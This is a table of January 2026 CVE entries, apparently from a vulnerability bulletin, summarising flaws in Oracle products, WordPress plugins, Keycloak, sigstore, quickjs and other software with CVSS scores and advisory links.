| Oracle Corporation--Oracle Utilities Application Framework | Vulnerability in the Oracle Utilities Application Framework product of Oracle Utilities Applications (component: General). Supported versions that are affected are 4.4.0.3.0, 4.5.0.0.0, 4.5.0.1.1, 4.5.0.1.3, 4.5.0.2.0, 25.4 and 25.10. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Utilities Application Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Utilities Application Framework, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Utilities Application Framework accessible data as well as unauthorized read access to a subset of Oracle Utilities Application Framework accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 5.4 | CVE-2026-21924 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). | 2026-01-20 | 6 | CVE-2026-21963 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). | 2026-01-20 | 6 | CVE-2026-21985 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 4.6 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:L). | 2026-01-20 | 4.6 | CVE-2026-21981 | Oracle Advisory |
| Oracle Corporation--Oracle Workflow | Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Workflow Loader). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Workflow. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Workflow accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N). | 2026-01-20 | 4.9 | CVE-2026-21959 | Oracle Advisory |
| Oracle Corporation--PeopleSoft Enterprise HCM Human Resources | Vulnerability in the PeopleSoft Enterprise HCM Human Resources product of Oracle PeopleSoft (component: Company Dir / Org Chart Viewer, Employee Snapshot). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise HCM Human Resources. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise HCM Human Resources, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise HCM Human Resources accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise HCM Human Resources accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21961 | Oracle Advisory |
| Oracle Corporation--PeopleSoft Enterprise PeopleTools | Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21938 | Oracle Advisory |
| Oracle Corporation--PeopleSoft Enterprise PeopleTools | Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Integration Broker). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21951 | Oracle Advisory |
| Oracle Corporation--PeopleSoft Enterprise PeopleTools | Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Push Notifications). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N). | 2026-01-20 | 5.4 | CVE-2026-21934 | Oracle Advisory |
| Oracle Corporation--PeopleSoft Enterprise SCM Purchasing | Vulnerability in the PeopleSoft Enterprise SCM Purchasing product of Oracle PeopleSoft (component: Purchasing). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise SCM Purchasing. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise SCM Purchasing accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise SCM Purchasing accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N). | 2026-01-20 | 5.4 | CVE-2026-21971 | Oracle Advisory |
| ostin654--JustClick registration plugin | The JustClick registration plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 0.1. This is due to insufficient input sanitization and output escaping on the `PHP_SELF` server variable. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-24 | 6.1 | CVE-2025-13676 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f1420ec8-55e4-448d-8230-228d1e566b97?source=cve https://plugins.trac.wordpress.org/browser/justclick-subscriber/trunk/justclick.php#L154 https://plugins.trac.wordpress.org/browser/justclick-subscriber/tags/0.1/justclick.php#L154 |
| Palantir--com.palantir.aries:aries | A vulnerability in Palantir's Aries service allowed unauthenticated access to log viewing and management functionality on Apollo instances using default configuration. The defect resulted in both authentication and authorization checks being bypassed, potentially allowing any network-accessible client to view system logs and perform operations without valid credentials. No evidence of exploitation was identified during the vulnerability window. | 2026-01-22 | 6.6 | CVE-2025-68609 | https://palantir.safebase.us/?tcuUid=955a313a-1735-48a6-9fb4-e10404f14eb5 |
| pdfcrowd--Save as PDF Plugin by PDFCrowd | The Save as PDF Plugin by PDFCrowd plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'options' parameter in all versions up to, and including, 4.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. NOTE: Successful exploitation of this vulnerability requires that the PDFCrowd API key is blank (also known as "demo mode", which is the default configuration when the plugin is installed) or known. | 2026-01-24 | 6.1 | CVE-2026-0862 | https://www.wordfence.com/threat-intel/vulnerabilities/id/74172fcb-7428-464a-89f1-f1f3af50e361?source=cve https://plugins.trac.wordpress.org/changeset/3438577/save-as-pdf-by-pdfcrowd |
| peachpay--PeachPay Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net) | The PeachPay - Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability checks on the ConvesioPay webhook REST endpoint in all versions up to, and including, 1.119.8. This makes it possible for unauthenticated attackers to modify the status of arbitrary WooCommerce orders. | 2026-01-20 | 5.3 | CVE-2025-14978 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5480a151-3e3a-46ba-9712-6c61fba06812?source=cve https://plugins.trac.wordpress.org/browser/peachpay-for-woocommerce/tags/1.119.5/core/payments/convesiopay/routes/class-peachpay-convesiopay-webhook.php#L33 |
| PHPGurukul--News Portal | A vulnerability was identified in PHPGurukul News Portal 1.0. The affected element is an unknown function of the file /admin/add-subadmins.php of the component Add Sub-Admin Page. Such manipulation leads to improper authorization. The attack can be launched remotely. The exploit is publicly available and might be used. | 2026-01-19 | 6.3 | CVE-2026-1141 | VDB-341733 | PHPGurukul News Portal Add Sub-Admin add-subadmins.php improper authorization VDB-341733 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735483 | PHPGurukul News Portal Project in PHP and MySql 1.0 Improper Access Controls https://github.com/Asim-QAZi/BrokenAccessControl-News-Portal-Project-in-PHP-and-MySQL-in-PHPGurukul https://phpgurukul.com/ |
| PHPGurukul--News Portal | A security flaw has been discovered in PHPGurukul News Portal 1.0. The impacted element is an unknown function. Performing a manipulation results in cross-site request forgery. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-19 | 4.3 | CVE-2026-1142 | VDB-341734 | PHPGurukul News Portal cross-site request forgery VDB-341734 | CTI Indicators (IOB, IOC) Submit #735498 | PHPGurukul News Portal Project in PHP and MySql 1.0 Cross-Site Request Forgery https://github.com/Asim-QAZi/CSRF-Add-Subadmin-in-News-Portal-Project-in-PHP-and-MySql-in-PHPGurukul https://phpgurukul.com/ |
| plugins360--All-in-One Video Gallery | The All-in-One Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `ajax_callback_create_bunny_stream_video`, `ajax_callback_get_bunny_stream_video`, and `ajax_callback_delete_bunny_stream_video` functions in all versions up to, and including, 4.6.4. This makes it possible for unauthenticated attackers to create and delete videos on the Bunny Stream CDN associated with the victim's account, provided they can obtain a valid nonce which is exposed in public player templates. | 2026-01-23 | 6.5 | CVE-2025-14947 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bedfb712-faf6-4131-b254-e6d7c367f49f?source=cve https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/includes/init.php#L373 https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/bunny-stream.php#L131 https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/bunny-stream.php#L285 https://plugins.trac.wordpress.org/changeset/3441541/ |
| plugins360--All-in-One Video Gallery | The All-in-One Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_callback_store_user_meta() function in versions 4.1.0 to 4.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary string-based user meta keys for their own account. | 2026-01-24 | 4.3 | CVE-2025-15516 | https://www.wordfence.com/threat-intel/vulnerabilities/id/218e4ed5-661b-49e1-8b23-457a93fd53fa?source=cve https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/tags/4.6.4/admin/admin.php#L1062 |
| pytest--pytest | pytest through 9.0.2 on UNIX relies on directories with the /tmp/pytest-of-{user} name pattern, which allows local users to cause a denial of service or possibly gain privileges. | 2026-01-22 | 6.8 | CVE-2025-71176 | https://github.com/pytest-dev/pytest/issues/13669 https://www.openwall.com/lists/oss-security/2026/01/21/5 |
| quickjs-ng--quickjs | A vulnerability was detected in quickjs-ng quickjs up to 0.11.0. Affected is an unknown function of the file quickjs.c of the component Atomics Ops Handler. The manipulation results in use after free. The attack can be executed remotely. The exploit is now public and may be used. The patch is identified as ea3e9d77454e8fc9cb3ef3c504e9c16af5a80141. Applying a patch is advised to resolve this issue. | 2026-01-19 | 6.3 | CVE-2026-1144 | VDB-341737 | quickjs-ng quickjs Atomics Ops quickjs.c use after free VDB-341737 | CTI Indicators (IOB, IOC, IOA) Submit #735537 | quickjs-ng quickjs v0.11.0 Use After Free Submit #735538 | quickjs-ng quickjs v0.11.0 Use After Free (Duplicate) https://github.com/quickjs-ng/quickjs/issues/1301 https://github.com/quickjs-ng/quickjs/pull/1303 https://github.com/quickjs-ng/quickjs/issues/1302 https://github.com/quickjs-ng/quickjs/commit/ea3e9d77454e8fc9cb3ef3c504e9c16af5a80141 |
| quickjs-ng--quickjs | A flaw has been found in quickjs-ng quickjs up to 0.11.0. Affected by this vulnerability is the function js_typed_array_constructor_ta of the file quickjs.c. This manipulation causes heap-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used. Patch name: 53aebe66170d545bb6265906fe4324e4477de8b4. It is suggested to install a patch to address this issue. | 2026-01-19 | 6.3 | CVE-2026-1145 | VDB-341738 | quickjs-ng quickjs quickjs.c js_typed_array_constructor_ta heap-based overflow VDB-341738 | CTI Indicators (IOB, IOC, IOA) Submit #735539 | quickjs-ng quickjs v0.11.0 Heap-based Buffer Overflow https://github.com/quickjs-ng/quickjs/issues/1305 https://github.com/quickjs-ng/quickjs/pull/1306 https://github.com/quickjs-ng/quickjs/issues/1305#issue-3785444372 https://github.com/paralin/quickjs/commit/53aebe66170d545bb6265906fe4324e4477de8b4 |
| rebelcode--RSS Aggregator RSS Import, News Feeds, Feed to Post, and Autoblogging | The RSS Aggregator - RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-rss-aggregator' shortcode in all versions up to, and including, 5.0.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-23 | 6.4 | CVE-2025-14745 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dd201949-d3a1-4fdb-bf98-252fbfd59380?source=cve https://plugins.trac.wordpress.org/browser/wp-rss-aggregator/trunk/core/src/Renderer.php#L209 https://plugins.trac.wordpress.org/changeset/3439384/wp-rss-aggregator/trunk/core/src/Renderer.php |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in the keycloak-services component of Keycloak. This vulnerability allows the issuance of access and refresh tokens for disabled users, leading to unauthorized use of previously revoked privileges, via a business logic vulnerability in the Token Exchange implementation when a privileged client invokes the token exchange flow. | 2026-01-21 | 6.5 | CVE-2025-14559 | https://access.redhat.com/security/cve/CVE-2025-14559 RHBZ#2421711 |
| Red Hat--Red Hat Build of Keycloak | A flaw was identified in Keycloak's OpenID Connect Dynamic Client Registration feature when clients authenticate using private_key_jwt. The issue allows a client to specify an arbitrary jwks_uri, which Keycloak then retrieves without validating the destination. This enables attackers to coerce the Keycloak server into making HTTP requests to internal or restricted network resources. As a result, attackers can probe internal services and cloud metadata endpoints, creating an information disclosure and reconnaissance risk. | 2026-01-20 | 5.8 | CVE-2026-1180 | https://access.redhat.com/security/cve/CVE-2026-1180 RHBZ#2430781 |
| robiulawal40--Alpha Blocks | The Alpha Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'alpha_block_css' parameter in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2025-14985 | https://www.wordfence.com/threat-intel/vulnerabilities/id/745dcc4c-1c52-4ac7-9ac6-033770282a3b?source=cve https://plugins.trac.wordpress.org/browser/alpha-blocks/tags/1.5.0/class/block_inline_style.php#L175 |
| rtowebsites--AdminQuickbar | The AdminQuickbar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.3. This is due to missing or incorrect nonce validation on the 'saveSettings' and 'renamePost' AJAX actions. This makes it possible for unauthenticated attackers to modify plugin settings and update post titles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-14630 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bb70ad52-b964-4c56-98a2-06be375a79af?source=cve https://plugins.trac.wordpress.org/browser/adminquickbar/tags/1.9.3/Lib/AdminQuickbar.php#L88 https://plugins.trac.wordpress.org/browser/adminquickbar/tags/1.9.3/Lib/Sidebar.php#L386 https://plugins.trac.wordpress.org/browser/adminquickbar/trunk/Lib/AdminQuickbar.php#L88 https://plugins.trac.wordpress.org/browser/adminquickbar/trunk/Lib/Sidebar.php#L386 |
| Sangfor--Operation and Maintenance Security Management System | A security flaw has been discovered in Sangfor Operation and Maintenance Security Management System up to 3.0.12. This affects the function edit_pwd_mall of the file /fort/login/edit_pwd_mall. The manipulation of the argument flag results in weak password recovery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-22 | 5.3 | CVE-2026-1325 | VDB-342301 | Sangfor Operation and Maintenance Security Management System edit_pwd_mall password recovery VDB-342301 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #736208 | Sangfor Operation and Maintenance Security Management System (OSM / è¿ç»´å®‰å…¨ç®¡ç†ç³»ç»Ÿ) 3.0.12 Unauthenticated Arbitrary Password Reset https://github.com/LX-LX88/cve/issues/21 |
| satollo--Newsletter Send awesome emails from WordPress | The Newsletter - Send awesome emails from WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 9.1.0. This is due to missing or incorrect nonce validation on the hook_newsletter_action() function. This makes it possible for unauthenticated attackers to unsubscribe newsletter subscribers via a forged request granted they can trick a logged-in user into performing an action such as clicking on a link. | 2026-01-20 | 4.3 | CVE-2026-1051 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8de2156f-5087-4c16-8e5d-93b5c72ec536?source=cve https://plugins.trac.wordpress.org/browser/newsletter/tags/9.1.0/unsubscription/unsubscription.php#L141 |
| sauravrox--Set Bulk Post Categories | The Set Bulk Post Categories plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing nonce validation on the bulk category update functionality. This makes it possible for unauthenticated attackers to modify post categories in bulk via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1081 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9503f908-ead2-4c34-89b9-1e2348b90f3c?source=cve https://plugins.trac.wordpress.org/browser/set-bulk-post-categories/trunk/set-bulk-categories.php#L36 https://plugins.trac.wordpress.org/browser/set-bulk-post-categories/tags/1.1/set-bulk-categories.php#L36 |
| Seacms--Seacms | SeaCMS 11.1 contains a stored cross-site scripting vulnerability in the checkuser parameter of the admin settings page. Attackers can inject malicious JavaScript payloads that will execute in users' browsers when the page is loaded. | 2026-01-25 | 6.4 | CVE-2020-36932 | ExploitDB-49251 Official Seacms Product Homepage VulnCheck Advisory: Seacms 11.1 - 'checkuser' Stored XSS |
| shahinurislam--Meta-box GalleryMeta | The Meta-box GalleryMeta plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mb_gallery' custom post type in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Author-level access and above, to create and publish galleries. | 2026-01-24 | 4.3 | CVE-2026-0687 | https://www.wordfence.com/threat-intel/vulnerabilities/id/872c61aa-c95c-4b86-8e39-8112bb117a0b?source=cve https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/include/posttype.php#L29 https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/gallerymetaboxes.php#L375 |
| shahinurislam--Meta-box GalleryMeta | The Meta-box GalleryMeta plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-24 | 4.4 | CVE-2026-1302 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bb9ae252-7e5f-4dc0-a162-100493b81980?source=cve https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/templates/single-mb_gallery.php#L31 https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/templates/single-mb_gallery.php#L33 https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/gallerymetaboxes.php#L119 https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/gallerymetaboxes.php#L314 |
| shazdeh--Administrative Shortcodes | The Administrative Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'login' and 'logout' shortcode attributes in all versions up to, and including, 0.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2026-1099 | https://www.wordfence.com/threat-intel/vulnerabilities/id/de931a65-c898-4b1d-99ce-20dd646bcbb0?source=cve https://plugins.trac.wordpress.org/browser/administrative-shortcodes/trunk/administrative-shortcodes.php#L196 https://plugins.trac.wordpress.org/browser/administrative-shortcodes/tags/0.3.4/administrative-shortcodes.php#L196 |
| sigstore--rekor | Rekor is a software supply chain transparency log. In versions 1.4.3 and below, the entry implementation can panic on attacker-controlled input when canonicalizing a proposed entry with an empty spec.message, causing nil Pointer Dereference. Function validate() returns nil (success) when message is empty, leaving sign1Msg uninitialized, and Canonicalize() later dereferences v.sign1Msg.Payload. A malformed proposed entry of the cose/v0.0.1 type can cause a panic on a thread within the Rekor process. The thread is recovered so the client receives a 500 error message and service still continues, so the availability impact of this is minimal. This issue has been fixed in version 1.5.0. | 2026-01-22 | 5.3 | CVE-2026-23831 | https://github.com/sigstore/rekor/security/advisories/GHSA-273p-m2cw-6833 https://github.com/sigstore/rekor/commit/39bae3d192bce48ef4ef2cbd1788fb5770fee8cd https://github.com/sigstore/rekor/releases/tag/v1.5.0 |
| sigstore--rekor | Rekor is a software supply chain transparency log. In versions 1.4.3 and below, attackers can trigger SSRF to arbitrary internal services because /api/v1/index/retrieve supports retrieving a public key via user-provided URL. Since the SSRF only can trigger GET requests, the request cannot mutate state. The response from the GET request is not returned to the caller so data exfiltration is not possible. A malicious actor could attempt to probe an internal network through Blind SSRF. The issue has been fixed in version 1.5.0. To workaround this issue, disable the search endpoint with --enable_retrieve_api=false. | 2026-01-22 | 5.3 | CVE-2026-24117 | https://github.com/sigstore/rekor/security/advisories/GHSA-4c4x-jm2x-pf9j https://github.com/sigstore/rekor/commit/60ef2bceba192c5bf9327d003bceea8bf1f8275f https://github.com/sigstore/rekor/releases/tag/v1.5.0 |
| sigstore--sigstore | sigstore framework is a common go library shared across sigstore services and clients. In versions 1.10.3 and below, the legacy TUF client (pkg/tuf/client.go) supports caching target files to disk. It constructs a filesystem path by joining a cache base directory with a target name sourced from signed target metadata; however, it does not validate that the resulting path stays within the cache base directory. A malicious TUF repository can trigger arbitrary file overwriting, limited to the permissions that the calling process has. Note that this should only affect clients that are directly using the TUF client in sigstore/sigstore or are using an older version of Cosign. Public Sigstore deployment users are unaffected, as TUF metadata is validated by a quorum of trusted collaborators. This issue has been fixed in version 1.10.4. As a workaround, users can disable disk caching for the legacy client by setting SIGSTORE_NO_CACHE=true in the environment, migrate to https://github.com/sigstore/sigstore-go/tree/main/pkg/tuf, or upgrade to the latest sigstore/sigstore release. | 2026-01-23 | 5.8 | CVE-2026-24137 | https://github.com/sigstore/sigstore/security/advisories/GHSA-fcv2-xgw5-pqxf https://github.com/sigstore/sigstore/commit/8ec410a2993ea78083aecf0e473a85453039496e https://github.com/sigstore/sigstore/releases/tag/v1.10.4 |
| SourceCodester--E-Learning System | A flaw has been found in SourceCodester E-Learning System 1.0. This impacts an unknown function of the file /admin/modules/lesson/index.php of the component Lesson Module Handler. Executing a manipulation of the argument Title/Description can lead to basic cross site scripting. The attack can be executed remotely. The exploit has been published and may be used. | 2026-01-19 | 4.3 | CVE-2026-1154 | VDB-341747 | SourceCodester E-Learning System Lesson index.php cross site scripting VDB-341747 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735855 | SourceCodester E-Learning System (CAIWL) 1.0 Stored HTML Injection Vulnerability https://gist.github.com/0xCaptainFahim/dada955760b424a851de12bccadee997 https://www.sourcecodester.com/ |
| SourceCodester--Patients Waiting Area Queue Management System | A vulnerability was determined in SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System 1.0. This vulnerability affects unknown code. Executing a manipulation can lead to cross-site request forgery. It is possible to launch the attack remotely. | 2026-01-19 | 4.3 | CVE-2026-1148 | VDB-341741 | SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System cross-site request forgery VDB-341741 | CTI Indicators (IOB, IOC) Submit #735545 | Patrick Mvuma Patients Waiting Area Queue Management System 1.0 Cross-Site Request Forgery |
| specialk--Head Meta Data | The Head Meta Data plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'head-meta-data' post meta field in all versions up to, and including, 20251118 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-20 | 6.4 | CVE-2026-0608 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9592bb6d-8e1d-4c89-addd-11c07272a628?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/head-meta-data/tags/20251118&new_path=/head-meta-data/tags/20260105 |
| Spring--Spring Security | The fix applied in CVE-2025-22228 inadvertently broke the timing attack mitigation implemented in DaoAuthenticationProvider. This can allow attackers to infer valid usernames or other authentication behavior via response-time differences under certain configurations. | 2026-01-22 | 5.3 | CVE-2025-22234 | Spring Security Advisory: CVE-2025-22234 |
| stefanristic--Simple Crypto Shortcodes | The Simple Crypto Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.2. This is due to missing nonce validation on the scs_backend function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-14903 | https://www.wordfence.com/threat-intel/vulnerabilities/id/18bcd2ad-1989-4e2b-b82e-fddc4201c5a6?source=cve https://plugins.trac.wordpress.org/browser/simple-crypto-shortcodes/tags/1.0.2/simple_crypto_shortcodes.php#L46 https://plugins.trac.wordpress.org/browser/simple-crypto-shortcodes/tags/1.0.2/simple_crypto_shortcodes.php#L54 |
| stellarwp--The Events Calendar | The The Events Calendar plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'start_migration', 'cancel_migration', and 'revert_migration' functions in all versions up to, and including, 6.15.13. This makes it possible for authenticated attackers, with subscriber level access and above, to start, cancel, or revert the Custom Tables V1 database migration, including dropping the custom database tables entirely via the revert action. | 2026-01-20 | 5.4 | CVE-2025-15043 | https://www.wordfence.com/threat-intel/vulnerabilities/id/346a5b00-fb76-4413-a935-a2df4dc51984?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/the-events-calendar/tags/6.15.13&new_path=/the-events-calendar/tags/6.15.13.1 |
| sumatrapdfreader--sumatrapdf | SumatraPDF is a multi-format reader for Windows. All versions contain an off-by-one error in the validation code that only triggers with exactly 2 records, causing an integer underflow in the size calculation. This bug exists in PalmDbReader::GetRecord when opening a crafted Mobi file, resulting in an out-of-bounds heap read that crashes the app. There are no published fixes at the time of publication. | 2026-01-22 | 5.5 | CVE-2026-23951 | https://github.com/sumatrapdfreader/sumatrapdf/security/advisories/GHSA-hj4w-c5x8-p2hv https://github.com/sumatrapdfreader/sumatrapdf/blob/master/src/PalmDbReader.cpp |
